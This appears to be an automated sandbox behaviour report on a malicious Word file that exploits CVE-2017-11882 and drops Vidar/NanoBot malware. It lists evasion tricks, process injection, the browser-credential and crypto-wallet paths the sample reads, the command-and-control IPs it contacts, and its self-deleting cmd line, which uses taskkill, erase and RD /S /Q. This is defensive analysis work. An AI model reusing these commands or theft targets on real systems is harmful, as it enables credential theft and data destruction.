    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Source: toqqx.exe, 00000004.00000002.2234554822.0000000000760000.00000004.00000001.sdmp, toqqx.exe, 00000008.00000002.2250803213.0000000000A60000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
    Source: C:\Users\user\toqqx.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2544 | Thread sleep time: -300000s >= -30000s
    Source: C:\Users\user\toqqx.exe TID: 2892 | Thread sleep time: -180000s >= -30000s
    Source: C:\Users\user\toqqx.exe TID: 2652 | Thread sleep time: -60000s >= -30000s
    Source: C:\Users\user\toqqx.exe TID: 2848 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 960 | Thread sleep time: -60000s >= -30000s
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2468 | Thread sleep time: -300000s >= -30000s
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2468 | Thread sleep time: -60000s >= -30000s
    Source: C:\Users\user\toqqx.exe TID: 2212 | Thread sleep time: -180000s >= -30000s
    Source: C:\Users\user\toqqx.exe TID: 2768 | Thread sleep time: -60000s >= -30000s
    Source: C:\Users\user\toqqx.exe TID: 2252 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1772 | Thread sleep time: -60000s >= -30000s (2 occurrences)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2200 | Thread sleep time: -60000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe TID: 2620 | Thread sleep time: -120000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe TID: 2456 | Thread sleep time: -240000s >= -30000s
    Source: C:\Windows\SysWOW64\taskkill.exe TID: 1900 | Thread sleep time: -60000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | File Volume queried: C:\ FullSizeInformation
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_0041D360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_004043DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_00420540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_0041E640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_0041F6B0 FindFirstFileExW,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_0041E640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_0041D360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_004043DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_00420540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_0041F6B0 FindFirstFileExW,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_0041B4E0 GetSystemInfo,
    Source: C:\Users\user\toqqx.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
    Source: toqqx.exe, 00000008.00000002.2250803213.0000000000A60000.00000004.00000001.sdmp | Binary or memory string: vmware+microsoft corporation
    Source: C:\Users\user\toqqx.exe | Process information queried: ProcessInformation
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Process queried: DebugPort (2 occurrences)
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_0041DCA0 GetCurrentDirectoryA,lstrcat,CopyFileA,_memset,wsprintfA,LdrInitializeThunk,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_fprintf,_fprintf,DeleteFileA,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_004072E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_0041C810 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_004196D0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_0041B750 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_004196D0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_0041B750 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_0041B160 GetCurrentHwProfileA,GetProcessHeap,HeapAlloc,lstrcat,
    Source: C:\Users\user\toqqx.exe | Process token adjusted: Debug (2 occurrences)
    Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_004072E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_00404354 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_0040E5C7 SetUnhandledExceptionFilter,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_004072E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_00404354 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 13_2_0040E5C7 SetUnhandledExceptionFilter,
    Source: C:\Users\user\toqqx.exe | Memory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion:

    Allocates memory in foreign processes
    Source: C:\Users\user\toqqx.exe | Memory allocated: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 400000 protect: page execute and read and write (2 occurrences)
    Injects a PE file into a foreign processes
    Source: C:\Users\user\toqqx.exe | Memory written: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 400000 value starts with: 4D5A (2 occurrences)
    Writes to foreign memory regions
    Source: C:\Users\user\toqqx.exe | Memory written: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 400000 (2 occurrences)
    Source: C:\Users\user\toqqx.exe | Memory written: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 401000 (2 occurrences)
    Source: C:\Users\user\toqqx.exe | Memory written: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 427000 (2 occurrences)
    Source: C:\Users\user\toqqx.exe | Memory written: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 430000 (2 occurrences)
    Source: C:\Users\user\toqqx.exe | Memory written: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 435000 (2 occurrences)
    Source: C:\Users\user\toqqx.exe | Memory written: C:\Users\user\AppData\Local\Temp\toqqx.exe base: 7EFDE008 (2 occurrences)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\toqqx.exe C:\Users\user\toqqx.exe (2 occurrences)
    Source: C:\Users\user\toqqx.exe | Process created: C:\Users\user\AppData\Local\Temp\toqqx.exe C:\Users\user\AppData\Local\Temp\toqqx.exe (2 occurrences)
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /pid 2540 & erase C:\Users\user\AppData\Local\Temp\toqqx.exe & RD /S /Q C:\\ProgramData\\843743064682002\\* & exit
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 2540 (2 occurrences)
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree, (2 occurrences)
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (2 occurrences)
    Source: C:\Users\user\toqqx.exe | Queries volume information: C:\Users\user\toqqx.exe VolumeInformation (2 occurrences)
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Queries volume information: C:\ProgramData\843743064682002\autofill\Google Chrome_Default.txt VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Queries volume information: C:\ProgramData\843743064682002\cc\Google Chrome_Default.txt VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Queries volume information: C:\ProgramData\843743064682002\cookies\Google Chrome_Default.txt VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Queries volume information: C:\ProgramData\843743064682002\cookies\Mozilla Firefox_7xwghk55.default.txt VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Queries volume information: C:\ProgramData\843743064682002\outlook.txt VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Queries volume information: C:\ProgramData\843743064682002\passwords.txt VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Queries volume information: C:\ProgramData\843743064682002\screenshot.jpg VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Queries volume information: C:\ProgramData\843743064682002\system.txt VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_00416D00 SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_0041B1E0 GetUserNameA,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_0040D6E2 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | Code function: 11_2_0041BEE0 _memset,_memset,GetVersionExA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,FreeLibrary,
    Source: C:\Users\user\toqqx.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Stealing of Sensitive Information:

    Yara detected Vidar stealer
    Source: Yara match | File source: Process Memory Space: toqqx.exe PID: 2540, type: MEMORY
    Found many strings related to Crypto-Wallets (likely being stolen)
    Source: toqqx.exe, 0000000B.00000003.2260423526.000000000089C000.00000004.00000001.sdmp | String found in binary or memory: Electrum
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmp | String found in binary or memory: \\ElectronCash
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmp | String found in binary or memory: window-state.json
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmp | String found in binary or memory: \\jaxx\\
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmp | String found in binary or memory: exodus.conf.json
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmp | String found in binary or memory: info.seco
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmp | String found in binary or memory: \\Exodus\\
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmp | String found in binary or memory: passphrase.json
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmp | String found in binary or memory: \\Ethereum\\
    Source: toqqx.exe, 0000000B.00000003.2260423526.000000000089C000.00000004.00000001.sdmp | String found in binary or memory: Exodus
    Source: toqqx.exe, 0000000B.00000003.2260423526.000000000089C000.00000004.00000001.sdmp | String found in binary or memory: Ethereum
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmp | String found in binary or memory: default_wallet
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmp | String found in binary or memory: multidoge.wallet
    Source: toqqx.exe, 0000000B.00000002.2265172555.0000000000346000.00000004.00000040.sdmp | String found in binary or memory: seed.seco
    Source: toqqx.exe, 00000004.00000002.2234554822.0000000000760000.00000004.00000001.sdmp | String found in binary or memory: set_UseMachineKeyStore
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
    Tries to steal Crypto Currency Wallets
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ (3 occurrences)
    Source: C:\Users\user\AppData\Local\Temp\toqqx.exe | File opened: C:\Users\user\AppData\Roaming\MultiDoge\

    Remote Access Functionality:

    Yara detected Vidar stealer
    Source: Yara match | File source: Process Memory Space: toqqx.exe PID: 2540, type: MEMORY

    Mitre Att&ck Matrix

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Windows Management Instrumentation 1 | Application Shimming 1 | Application Shimming 1 | Disable or Modify Tools 11 | OS Credential Dumping 1 | System Time Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Data Obfuscation 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Native API 1 | Registry Run Keys / Startup Folder 11 | Process Injection 311 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Data from Local System 3 | Exfiltration Over Bluetooth | Ingress Tool Transfer 13 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | Exploitation for Client Execution 12 | Logon Script (Windows) | Registry Run Keys / Startup Folder 11 | Obfuscated Files or Information 4 | Security Account Manager | File and Directory Discovery 2 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Encrypted Channel 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | Command and Scripting Interpreter 1 | Logon Script (Mac) | Logon Script (Mac) | Software Packing 3 | NTDS | System Information Discovery 38 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | - | Carrier Billing Fraud
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 111 | LSA Secrets | Security Software Discovery 231 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 22 | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 31 | Cached Domain Credentials | Process Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
    External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 311 | DCSync | Virtualization/Sandbox Evasion 31 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Owner/User Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue
    Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Remote System Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | - | Data Destruction

    Behavior Graph

    Behavior Graph ID: 404284 | Sample: PL_503_13_570.docx | Startdate: 04/05/2021 | Architecture: WINDOWS | Score: 100
    (The graph itself is an image; the node text recovered from it is listed below.)
    Sample-level signatures: Found malware configuration; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 11 other signatures
    Started processes: EQNEDT32.EXE (two instances), WINWORD.EXE, 3 other processes
    EQNEDT32.EXE: contacts 31.210.20.6, 49165, 80 (PLUSSERVER-ASN1DE, Netherlands); drops C:\Users\user\toqqx.exe (PE32) and C:\Users\user\AppData\Local\...\Sugvt[1].exe (PE32); signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802); starts toqqx.exe (one instance per EQNEDT32.EXE)
    toqqx.exe (first instance): drops C:\Users\user\AppData\Local\Temp\toqqx.exe (PE32); signatures: Multi AV Scanner detection for dropped file, Creates an undocumented autostart registry key, Writes to foreign memory regions; starts toqqx.exe
    toqqx.exe (second instance): drops C:\Users\user\AppData\Roaming\...\notpad.exe (PE32); signatures: Allocates memory in foreign processes, Injects a PE file into a foreign processes; starts toqqx.exe
    toqqx.exe (child of the first instance): contacts 198.98.60.43, 49166, 49167, 80 (PONYNETUS, United States); drops C:\ProgramData\sqlite3.dll (PE32); signatures: Multi AV Scanner detection for dropped file, Tries to harvest and steal browser information (history, passwords, etc), Tries to steal Crypto Currency Wallets; starts cmd.exe
    toqqx.exe (child of the second instance): drops C:\ProgramData\vcruntime140.dll, C:\ProgramData\softokn3.dll, C:\ProgramData\nss3.dll (all PE32) and 3 other files (none is malicious)
    cmd.exe: starts taskkill.exe


    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    Source | Detection | Scanner | Label
    PL_503_13_570.docx | 36% | Virustotal |
    PL_503_13_570.docx | 34% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882

    Dropped Files

    Source | Detection | Scanner | Label
    C:\ProgramData\freebl3.dll | 0% | Metadefender |
    C:\ProgramData\freebl3.dll | 0% | ReversingLabs |
    C:\ProgramData\mozglue.dll | 3% | Metadefender |
    C:\ProgramData\mozglue.dll | 0% | ReversingLabs |
    C:\ProgramData\msvcp140.dll | 0% | Metadefender |
    C:\ProgramData\msvcp140.dll | 0% | ReversingLabs |
    C:\ProgramData\nss3.dll | 0% | Metadefender |
    C:\ProgramData\nss3.dll | 0% | ReversingLabs |
    C:\ProgramData\softokn3.dll | 0% | Metadefender |
    C:\ProgramData\softokn3.dll | 0% | ReversingLabs |
    C:\ProgramData\sqlite3.dll | 0% | Metadefender |
    C:\ProgramData\sqlite3.dll | 0% | ReversingLabs |
    C:\ProgramData\vcruntime140.dll | 0% | Metadefender |
    C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Sugvt[1].exe | 47% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoBot
    C:\Users\user\AppData\Local\Temp\toqqx.exe | 47% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoBot
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exe | 47% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoBot
    C:\Users\user\toqqx.exe | 47% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoBot

    Unpacked PE Files

    Source | Detection | Scanner | Label
    8.2.toqqx.exe.26d92d4.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
    4.2.toqqx.exe.34fea98.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
    8.2.toqqx.exe.3526ab8.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
    4.2.toqqx.exe.2537438.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
    11.2.toqqx.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1136795
    4.2.toqqx.exe.3576ad8.7.unpack | 100% | Avira | TR/Patched.Ren.Gen
    8.2.toqqx.exe.34fea98.6.unpack | 100% | Avira | TR/Patched.Ren.Gen
